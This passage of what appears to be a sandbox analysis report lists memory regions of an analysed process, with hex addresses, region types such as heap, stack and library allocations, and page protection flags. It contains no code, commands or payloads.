page read and write
21333000
trusted library allocation
page read and write
4BB000
heap
page read and write
3AC000
stack
page read and write
2527EF13000
heap
page read and write
22400000
trusted library allocation
page read and write
1FA10000
heap
page read and write
25AE000
stack
page read and write
4020000
direct allocation
page read and write
202ED000
trusted library allocation
page read and write
1FD8F000
stack
page read and write
1FF20000
trusted library allocation
page read and write
20230000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
2527EE9F000
heap
page read and write
4010000
direct allocation
page read and write
6E51000
heap
page read and write
40D0000
heap
page read and write
449E000
stack
page read and write
48AE000
stack
page read and write
214B0000
trusted library allocation
page read and write
235C0000
trusted library allocation
page read and write
25204720000
trusted library allocation
page read and write
1F8CD000
stack
page read and write
454000
unkown
page readonly
21537000
trusted library allocation
page read and write
203FF000
trusted library allocation
page read and write
8060000
heap
page read and write
1FF20000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
5BF0000
heap
page read and write
4149000
heap
page read and write
23470000
trusted library allocation
page read and write
22400000
trusted library allocation
page read and write
1FD10000
remote allocation
page read and write
1FA0F000
stack
page read and write
2520450A000
heap
page read and write
202A9000
trusted library allocation
page read and write
22400000
trusted library allocation
page read and write
2527EE00000
heap
page read and write
49C0000
heap
page read and write
212E5000
trusted library allocation
page read and write
778000
heap
page read and write
7250000
trusted library allocation
page read and write
20305000
trusted library allocation
page read and write
7EF15F7000
stack
page read and write
229E1000
heap
page read and write
2527FFB0000
trusted library section
page readonly
22400000
trusted library allocation
page read and write
70A00000
unkown
page readonly
234D0000
trusted library allocation
page read and write
234E0000
trusted library allocation
page execute and read and write
201F6000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
223F4000
trusted library allocation
page read and write
22400000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
7BF000
stack
page read and write
4B5000
heap
page read and write
7EF2DFB000
stack
page read and write
23470000
trusted library allocation
page read and write
1FF21000
trusted library allocation
page read and write
1FDA0000
direct allocation
page read and write
20580000
trusted library allocation
page read and write
7EF20FB000
stack
page read and write
235B0000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
1FF00000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
3EB0000
direct allocation
page read and write
71D6000
heap
page read and write
22410000
trusted library allocation
page execute and read and write
8FF000
stack
page read and write
234D0000
trusted library allocation
page read and write
270D000
heap
page read and write
21572000
trusted library allocation
page read and write
20230000
trusted library allocation
page read and write
8000000
trusted library allocation
page read and write
22400000
trusted library allocation
page read and write
400000
unkown
page readonly
412E000
heap
page read and write
2130F000
trusted library allocation
page read and write
7EF19FE000
unkown
page readonly
2527F71A000
heap
page read and write
234D0000
trusted library allocation
page read and write
4B5000
heap
page read and write
1FF00000
trusted library allocation
page read and write
21314000
trusted library allocation
page read and write
252044C7000
heap
page read and write
B0000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
234D0000
trusted library allocation
page read and write
4960000
direct allocation
page read and write
22EBE000
stack
page read and write
1FF20000
trusted library allocation
page read and write
22400000
trusted library allocation
page read and write
2527EE90000
heap
page read and write
7E05000
trusted library allocation
page read and write
2159E000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
81F4000
heap
page read and write
1FD10000
remote allocation
page read and write
7EF2FFB000
stack
page read and write
204C6000
trusted library allocation
page read and write
235C0000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
25204770000
remote allocation
page read and write
23470000
trusted library allocation
page read and write
2057A000
trusted library allocation
page read and write
9B0000
trusted library section
page read and write
1FF00000
trusted library allocation
page read and write
23490000
trusted library allocation
page execute and read and write
374C000
stack
page read and write
23430000
trusted library allocation
page read and write
C7000
trusted library allocation
page execute and read and write
2251000
remote allocation
page execute and read and write
1FF00000
trusted library allocation
page read and write
4A3000
heap
page read and write
1FF10000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
7EF1AFC000
stack
page read and write
235C0000
trusted library allocation
page read and write
22B1D000
stack
page read and write
81EA000
heap
page read and write
7EF2CFE000
unkown
page readonly
7EF18FE000
stack
page read and write
22400000
trusted library allocation
page read and write
468000
heap
page read and write
8101000
heap
page read and write
7EF23FE000
unkown
page readonly
1FF00000
trusted library allocation
page read and write
3ED0000
direct allocation
page read and write
2703000
heap
page read and write
7EF2AFE000
stack
page read and write
3F07000
heap
page read and write
23470000
trusted library allocation
page read and write
21309000
trusted library allocation
page read and write
25204513000
heap
page read and write
70A02000
unkown
page readonly
22379000
heap
page read and write
1FF20000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
25204500000
heap
page read and write
234A0000
trusted library allocation
page read and write
234D0000
trusted library allocation
page read and write
2240D000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
4146000
heap
page read and write
22B60000
trusted library allocation
page read and write
234D0000
trusted library allocation
page read and write
1F68E000
stack
page read and write
98E000
stack
page read and write
1FF20000
trusted library allocation
page read and write
401000
unkown
page execute read
2527EEBD000
heap
page read and write
2527F590000
trusted library section
page read and write
1F7CD000
stack
page read and write
22B60000
trusted library allocation
page read and write
7EF24FE000
unkown
page readonly
22400000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
9DD000
trusted library allocation
page execute and read and write
2520442E000
heap
page read and write
446F000
stack
page read and write
AB31000
direct allocation
page execute and read and write
1FF20000
trusted library allocation
page read and write
19A000
stack
page read and write
8500000
trusted library allocation
page execute and read and write
7230000
trusted library allocation
page read and write
201FB000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
235C0000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
4420000
heap
page execute and read and write
1FF00000
trusted library allocation
page read and write
223F0000
trusted library allocation
page read and write
1FF00000
trusted library allocation
page read and write
22400000
trusted library allocation
page read and write
16C0000
remote allocation
page execute and read and write
22B60000
trusted library allocation
page read and write
1F78E000
stack
page read and write
20216000
trusted library allocation
page read and write
2527EEA6000
heap
page read and write
1FF20000
trusted library allocation
page read and write
4A3000
heap
page read and write
20058000
trusted library allocation
page read and write
214D8000
trusted library allocation
page read and write
22A13000
heap
page read and write
23470000
trusted library allocation
page read and write
90000
trusted library allocation
page read and write
2020E000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
235C0000
trusted library allocation
page read and write
2342F000
trusted library allocation
page read and write
7E30000
trusted library allocation
page read and write
7DA0000
heap
page read and write
23470000
trusted library allocation
page read and write
25204421000
heap
page read and write
70A04000
unkown
page readonly
201F0000
trusted library allocation
page read and write
7EF1BFE000
unkown
page readonly
4970000
direct allocation
page read and write
23470000
trusted library allocation
page read and write
4B5000
heap
page read and write
22400000
trusted library allocation
page read and write
22400000
trusted library allocation
page read and write
22F3F000
stack
page read and write
252046B0000
trusted library allocation
page read and write
7EF22FE000
unkown
page readonly
3EC0000
direct allocation
page read and write
2702000
heap
page read and write
22400000
trusted library allocation
page read and write
4BE000
heap
page read and write
23410000
trusted library allocation
page execute and read and write
8270000
trusted library allocation
page execute and read and write
7FD28000
trusted library allocation
page execute and read and write
4050000
direct allocation
page read and write
23470000
trusted library allocation
page read and write
7FF0000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
401000
unkown
page execute read
2155F000
trusted library allocation
page read and write
702E000
stack
page read and write
1FF20000
trusted library allocation
page read and write
234B0000
trusted library allocation
page execute and read and write
2F5E000
stack
page read and write
8260000
trusted library allocation
page execute and read and write
223FA000
trusted library allocation
page read and write
252043E0000
trusted library allocation
page read and write
4B5000
heap
page read and write
22B60000
trusted library allocation
page read and write
6AD000
stack
page read and write
234D0000
trusted library allocation
page read and write
20230000
trusted library allocation
page read and write
6FE0000
heap
page execute and read and write
A0000
trusted library allocation
page read and write
8300000
trusted library allocation
page read and write
81CA000
heap
page read and write
7DA000
heap
page read and write
22B60000
trusted library allocation
page read and write
71E1000
heap
page read and write
A05000
trusted library allocation
page execute and read and write
23470000
trusted library allocation
page read and write
7EF16FE000
unkown
page readonly
C5000
trusted library allocation
page execute and read and write
20230000
trusted library allocation
page read and write
49E000
heap
page read and write
252044C5000
heap
page read and write
22400000
trusted library allocation
page read and write
25204600000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
69E0000
direct allocation
page read and write
234F0000
trusted library allocation
page read and write
21522000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
2323F000
stack
page read and write
7260000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
4143000
heap
page read and write
23470000
trusted library allocation
page read and write
4080000
direct allocation
page read and write
4146000
heap
page read and write
1FF20000
trusted library allocation
page read and write
234D0000
trusted library allocation
page read and write
22382000
heap
page read and write
23470000
trusted library allocation
page read and write
806C000
heap
page read and write
821000
heap
page read and write
4A3000
heap
page read and write
1FF20000
trusted library allocation
page read and write
1FCBF000
stack
page read and write
252043E1000
trusted library allocation
page read and write
7FD10000
trusted library allocation
page execute and read and write
2527FFC0000
trusted library section
page readonly
2700000
heap
page read and write
7CD5000
stack
page read and write
8064000
heap
page read and write
23470000
trusted library allocation
page read and write
26AF000
stack
page read and write
203DC000
trusted library allocation
page read and write
20230000
trusted library allocation
page read and write